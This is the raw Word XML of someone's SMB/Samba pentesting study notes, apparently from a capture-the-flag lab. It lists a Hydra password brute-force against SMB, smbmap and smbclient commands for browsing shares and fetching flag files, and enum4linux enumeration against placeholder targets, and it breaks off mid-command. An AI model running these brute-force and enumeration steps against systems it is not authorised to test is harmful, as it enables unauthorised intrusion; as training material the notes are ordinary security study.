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5492" w14:textId="12602904" w:rsidR="00853ABF" w:rsidRPr="00E76D56" w:rsidRDefault="00E76D56">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E76D56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting SAMBA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C00DE65" w14:textId="77777777" w:rsidR="00E76D56" w:rsidRDefault="00E76D56"/>
    <w:p w14:paraId="34722614" w14:textId="67CE29BB" w:rsidR="00E76D56" w:rsidRDefault="00E76D56">
      <w:r>
        <w:t xml:space="preserve">Server message block </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58153C85" w14:textId="1A413976" w:rsidR="00E76D56" w:rsidRDefault="00E76D56">
      <w:r>
        <w:t>Network file sharing</w:t>
      </w:r>
      <w:r w:rsidR="000C223D">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000C223D">
        <w:t>peropherals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C223D">
        <w:t>protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61159078" w14:textId="42201327" w:rsidR="00E76D56" w:rsidRDefault="00E76D56">
      <w:r>
        <w:t xml:space="preserve">SMB =445 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCCB8A0" w14:textId="5BECD5A7" w:rsidR="00E76D56" w:rsidRDefault="00E76D56">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>TYPICALLY</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> old (on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nebios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 139</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0BAABC" w14:textId="77777777" w:rsidR="00E76D56" w:rsidRDefault="00E76D56"/>
    <w:p w14:paraId="4B0DC7E2" w14:textId="77FB7AFE" w:rsidR="008F7609" w:rsidRDefault="008F7609" w:rsidP="005606AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Username and password authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ADC9CB" w14:textId="4676C5E6" w:rsidR="008F7609" w:rsidRDefault="008F7609" w:rsidP="005606AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00E477B0">
        <w:t>enumerate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> samba share </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>drives ,download ,execute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> files. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5425E4" w14:textId="74D5A62A" w:rsidR="008F7609" w:rsidRDefault="008F7609" w:rsidP="005606AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00270113">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00270113">
        <w:t>part of SAMBA software suite)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> download file to the local machine vice versa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F8CACD" w14:textId="77777777" w:rsidR="008F7609" w:rsidRDefault="008F7609"/>
    <w:p w14:paraId="3EF0F7C8" w14:textId="6CC81C73" w:rsidR="006D56A8" w:rsidRPr="00E477B0" w:rsidRDefault="00E477B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E477B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263927E0" w14:textId="29511241" w:rsidR="005606AB" w:rsidRDefault="005606AB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="022D592B" w14:textId="03B7586E" w:rsidR="005606AB" w:rsidRDefault="005606AB">
      <w:r>
        <w:t>Nmap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363F40A6" w14:textId="77777777" w:rsidR="005606AB" w:rsidRDefault="005606AB"/>
    <w:p w14:paraId="1A1DEDEF" w14:textId="30089E90" w:rsidR="00F616EE" w:rsidRDefault="00F616EE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F616EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Perform brute-force</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747EAC0C" w14:textId="09923E22" w:rsidR="00F616EE" w:rsidRPr="00F616EE" w:rsidRDefault="00F616EE">
      <w:r>
        <w:t>Hydra -l admin   -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>P  /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/Metasploit-framework/data/wordlists/unix-password.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -t 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35F1A991" w14:textId="72FD3C34" w:rsidR="008F7609" w:rsidRDefault="008F7609"/>
    <w:p w14:paraId="50F6B3DA" w14:textId="33089667" w:rsidR="00F616EE" w:rsidRDefault="00F616EE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F616EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use SMBMAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00F616EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F842EA" w14:textId="572BDC3B" w:rsidR="009B25A3" w:rsidRDefault="00F616EE">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B25A3">
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009B25A3">
        <w:t>show help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC543B9" w14:textId="6D7A3345" w:rsidR="00F616EE" w:rsidRDefault="00F616EE">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -H </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u admin -p password1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A1867" w14:textId="77777777" w:rsidR="00F616EE" w:rsidRDefault="00F616EE"/>
    <w:p w14:paraId="2084DED4" w14:textId="03AD5140" w:rsidR="009B25A3" w:rsidRPr="009B25A3" w:rsidRDefault="009B25A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B25A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B25A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> :access</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B25A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> any of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B25A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>these share</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B25A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064AA153" w14:textId="3BD49112" w:rsidR="009B25A3" w:rsidRDefault="009B25A3">
      <w:r>
        <w:t xml:space="preserve">Man </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5345F4E5" w14:textId="0997D4A6" w:rsidR="009B25A3" w:rsidRDefault="009B25A3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -L </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u admin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595C4E4F" w14:textId="77777777" w:rsidR="009B25A3" w:rsidRDefault="009B25A3"/>
    <w:p w14:paraId="09AF65F9" w14:textId="77777777" w:rsidR="009B25A3" w:rsidRDefault="009B25A3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u admin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBFDD1C" w14:textId="77777777" w:rsidR="009B25A3" w:rsidRDefault="009B25A3">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>give</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28067C4A" w14:textId="77777777" w:rsidR="00A1732F" w:rsidRDefault="00A1732F">
      <w:r>
        <w:t>? #</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the help </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536A6141" w14:textId="352DA8D0" w:rsidR="00A1732F" w:rsidRDefault="00A1732F">
      <w:r>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B016B99" w14:textId="77777777" w:rsidR="00A1732F" w:rsidRDefault="00A1732F">
      <w:r>
        <w:t>Cd dev\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B70C4DD" w14:textId="77777777" w:rsidR="00A1732F" w:rsidRDefault="00A1732F">
      <w:r>
        <w:t xml:space="preserve">Dir </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B763746" w14:textId="77777777" w:rsidR="00A1732F" w:rsidRDefault="00A1732F">
      <w:r>
        <w:t xml:space="preserve">Cd run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60710BAE" w14:textId="268B8EFE" w:rsidR="00A1732F" w:rsidRDefault="00A1732F">
      <w:r>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683B94BD" w14:textId="77777777" w:rsidR="00A1732F" w:rsidRDefault="00A1732F">
      <w:r>
        <w:t xml:space="preserve">Cd test </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22687DD6" w14:textId="0B7105F1" w:rsidR="00A1732F" w:rsidRDefault="00A1732F">
      <w:r>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0387FF64" w14:textId="7C5B903B" w:rsidR="00A1732F" w:rsidRDefault="009B25A3">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330B54C2" w14:textId="53745447" w:rsidR="00A1732F" w:rsidRDefault="00A1732F" w:rsidP="00A1732F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>ancy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u admin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6627A2" w14:textId="794EDD6B" w:rsidR="00A1732F" w:rsidRDefault="00A1732F">
      <w:r>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F31F7A" w14:textId="2F28155A" w:rsidR="00A1732F" w:rsidRDefault="00A1732F">
      <w:r>
        <w:t xml:space="preserve">Cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="248CFEA9" w14:textId="549F1F8E" w:rsidR="00A1732F" w:rsidRDefault="00A1732F">
      <w:r>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3F386D" w14:textId="3E1E9F9D" w:rsidR="00A1732F" w:rsidRDefault="00A1732F">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Cd .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6091945B" w14:textId="4FED3E2F" w:rsidR="00A1732F" w:rsidRDefault="00A1732F">
      <w:r>
        <w:t xml:space="preserve">Cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AC14E8" w14:textId="000A970B" w:rsidR="00A1732F" w:rsidRDefault="00A1732F">
      <w:r>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A82AD90" w14:textId="46C6BBE2" w:rsidR="00A1732F" w:rsidRDefault="00A1732F">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Get  flag</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="25F67691" w14:textId="6C63693F" w:rsidR="00A1732F" w:rsidRDefault="00A1732F">
      <w:r>
        <w:t>Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EF1007" w14:textId="56147011" w:rsidR="00A1732F" w:rsidRDefault="00A1732F">
      <w:r>
        <w:t>Cat flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788AA655" w14:textId="77777777" w:rsidR="00A1732F" w:rsidRPr="00F616EE" w:rsidRDefault="00A1732F"/>
    <w:p w14:paraId="21691060" w14:textId="739913BA" w:rsidR="00A1732F" w:rsidRDefault="00A1732F" w:rsidP="00A1732F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -u admin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038058C7" w14:textId="7CD1FEDD" w:rsidR="00F616EE" w:rsidRDefault="000F18CF">
      <w:r>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371ED335" w14:textId="77777777" w:rsidR="000F18CF" w:rsidRDefault="000F18CF"/>
    <w:p w14:paraId="5CF1D5A5" w14:textId="5ABAA8BA" w:rsidR="000F18CF" w:rsidRDefault="000F18CF">
      <w:r>
        <w:t>Cd hidden\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEA5D29" w14:textId="0E8D5EEC" w:rsidR="000F18CF" w:rsidRDefault="000F18CF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA23B8D" w14:textId="1B00F995" w:rsidR="000F18CF" w:rsidRDefault="000F18CF">
      <w:r>
        <w:t xml:space="preserve">Get </w:t>
      </w:r>
      <w:r>
        <w:t>flag.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A429C9" w14:textId="159B0F89" w:rsidR="000F18CF" w:rsidRDefault="000F18CF">
      <w:r>
        <w:t>Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB96F42" w14:textId="4DD85B5A" w:rsidR="000F18CF" w:rsidRDefault="000F18CF">
      <w:r>
        <w:t xml:space="preserve">Tar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xzf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> flag.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F97661" w14:textId="29CC8787" w:rsidR="00CF0D86" w:rsidRDefault="000F18CF">
      <w:r>
        <w:t>Cat flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6791A81C" w14:textId="77777777" w:rsidR="000F18CF" w:rsidRDefault="000F18CF"/>
    <w:p w14:paraId="6AB4DBCA" w14:textId="639CDD86" w:rsidR="001151EA" w:rsidRPr="001151EA" w:rsidRDefault="001151EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001151EA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enumerate a lot of info about samba:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AEF196" w14:textId="49FDD0C9" w:rsidR="0042538B" w:rsidRPr="001151EA" w:rsidRDefault="0042538B">
      <w:r w:rsidRPr="001151EA">
        <w:t>Enum</w:t>
      </w:r>
      <w:r w:rsidR="001151EA">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="001151EA">
        <w:t xml:space="preserve">linux -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001151EA">
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19FA8D0C" w14:textId="6B67413E" w:rsidR="0042538B" w:rsidRDefault="0042538B">
      <w:r>
        <w:t xml:space="preserve"># it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>give</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> basic target info workgroup </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABAB0E1" w14:textId="6B4A9C46" w:rsidR="0042538B" w:rsidRDefault="0042538B">
      <w:r>
        <w:t xml:space="preserve">Give info about </w:t>
      </w:r>
      <w:r w:rsidR="001151EA">
        <w:t>samba.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229224EA" w14:textId="77777777" w:rsidR="001151EA" w:rsidRDefault="001151EA"/>
    <w:p w14:paraId="0F618CEA" w14:textId="6F5D3D56" w:rsidR="001151EA" w:rsidRDefault="001151EA">
      <w:r>
        <w:t xml:space="preserve">Enum4linux -a -u admin -p password1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="111CA9B4" w14:textId="726E57F3" w:rsidR="001151EA" w:rsidRDefault="001D1930">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>give</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> info of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ,users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shares ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> password </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>policy ,groups ,</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA3C803" w14:textId="77777777" w:rsidR="001151EA" w:rsidRDefault="001151EA"/>
    <w:p w14:paraId="333B58D5" w14:textId="77777777" w:rsidR="0042538B" w:rsidRDefault="0042538B"/>
    <w:p w14:paraId="763D025F" w14:textId="5066E0AF" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1930">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A4F460" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1930">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enum4linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743FD685" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:r w:rsidRPr="001D1930">
        <w:t>What it does (simple): all-in-one SMB/RPC enumeration — finds users, shares, OS/version hints, password policy, SIDs, trusts.</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1930">
        <w:br/>
        <w:t>Quick commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5015AFBD" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1930">
        <w:t>enum4linux -a 10.0.0.5 # run all checks against target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B03D693" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1930">
        <w:t>enum4linux -u user -p Passw0rd 10.0.0.5 # authenticated scan (if you have creds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4BBB58" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:r w:rsidRPr="001D1930">
        <w:t>What to look for: listed users, shares, policy info, and any anonymous/null session output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5ECED9" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2932374C" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve">What it does (simple): scans </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>shares</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> and shows what your account (or anonymous) can read/write — great to find writable shares and interesting files.</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1930">
        <w:br/>
        <w:t>Quick commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068017A2" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:lastRenderedPageBreak/>
        <w:t>smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> -H 10.0.0.5 -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>u ""</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>p "" #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
